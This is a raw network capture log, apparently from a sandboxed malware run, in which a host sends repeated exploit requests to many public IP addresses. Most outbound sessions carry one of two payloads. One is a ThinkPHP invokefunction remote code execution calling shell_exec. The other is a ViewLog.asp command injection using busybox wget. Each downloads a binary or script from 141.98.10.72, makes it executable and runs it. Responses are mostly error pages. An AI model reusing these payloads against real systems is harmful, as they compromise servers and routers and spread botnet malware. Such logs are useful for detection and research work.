Feb 14, 2024 09:30:14.973453999 CET	295	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:27:49 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
577	192.168.2.15	52326	95.153.45.136	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.754812956 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.976289034 CET	338	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 11:07:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
578	192.168.2.15	34114	95.79.100.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.762773991 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:14.992703915 CET	555	IN	Data Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 43 68 65 63 6b 20 50 6f 69 6e 74 20 53 56 4e 20 66 6f 75 6e 64 61 74 69 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 Data Ascii: UNKNOWN 400 Bad RequestServer: Check Point SVN foundationContent-Type: text/html; charset=UTF-8Date: Wed, 14 Feb 2024 08:30:14 GMTLast-Modified: Wed, 14 Feb 2024 08:30:14 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-

Session ID	Source IP	Source Port	Destination IP	Destination Port
579	192.168.2.15	48850	31.104.174.119	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.764703035 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
580	192.168.2.15	32778	85.239.66.90	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.780545950 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
581	192.168.2.15	56872	95.86.102.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.786062956 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
582	192.168.2.15	42574	31.136.18.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.786217928 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.480779886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:16.824740887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:19.544780970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.920566082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:35.672231913 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.687851906 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694439888 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
583	192.168.2.15	56930	31.43.30.62	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.798357964 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:15.031523943 CET	94	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:30:14 GMT Connection: Close

Session ID	Source IP	Source Port	Destination IP	Destination Port
584	192.168.2.15	60904	95.84.128.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.800116062 CET	268	IN	HTTP/1.0 400 Bad Request Server: httpd Date: Wed, 14 Feb 2024 08:30:14 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
585	192.168.2.15	40628	94.180.118.110	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:14.825504065 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
586	192.168.2.15	34140	95.79.100.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:15.221167088 CET	555	IN	Data Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 43 68 65 63 6b 20 50 6f 69 6e 74 20 53 56 4e 20 66 6f 75 6e 64 61 74 69 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 Data Ascii: UNKNOWN 400 Bad RequestServer: Check Point SVN foundationContent-Type: text/html; charset=UTF-8Date: Wed, 14 Feb 2024 08:30:15 GMTLast-Modified: Wed, 14 Feb 2024 08:30:15 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-

Session ID	Source IP	Source Port	Destination IP	Destination Port
587	192.168.2.15	51112	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:16.186988115 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
588	192.168.2.15	39940	112.83.37.177	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:16.369827986 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:16.692302942 CET	135	IN	HTTP/1.1 403 Forbidden Server: uvlive/6.4.2 Rev13 Connection:close Content-Length: 0 Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port
589	192.168.2.15	38792	88.221.105.185	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:16.578437090 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:16.787584066 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:30:16 GMT Date: Wed, 14 Feb 2024 08:30:16 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 39 36 39 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 36 26 23 34 36 3b 38 62 64 61 63 33 61 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b969dd58.1707899416.8bdac3a0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
590	192.168.2.15	41816	88.28.177.64	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:16.641449928 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:16.940058947 CET	536	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:17 GMT Content-Type: text/html Content-Length: 128 Connection: close X-Frame-Options: sameorigin X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer Permissions-Policy: geolocation=(), microphone=() Content-Security-Policy: default-src 'self' Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
591	192.168.2.15	51244	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:16.875627041 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
592	192.168.2.15	36210	62.232.130.170	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.318619013 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
593	192.168.2.15	54098	94.123.62.248	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.365114927 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
594	192.168.2.15	47528	31.200.48.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.365259886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
595	192.168.2.15	37256	94.123.54.251	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.366324902 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
596	192.168.2.15	47798	31.136.120.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:17.539943933 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:18.232897997 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:19.576783895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
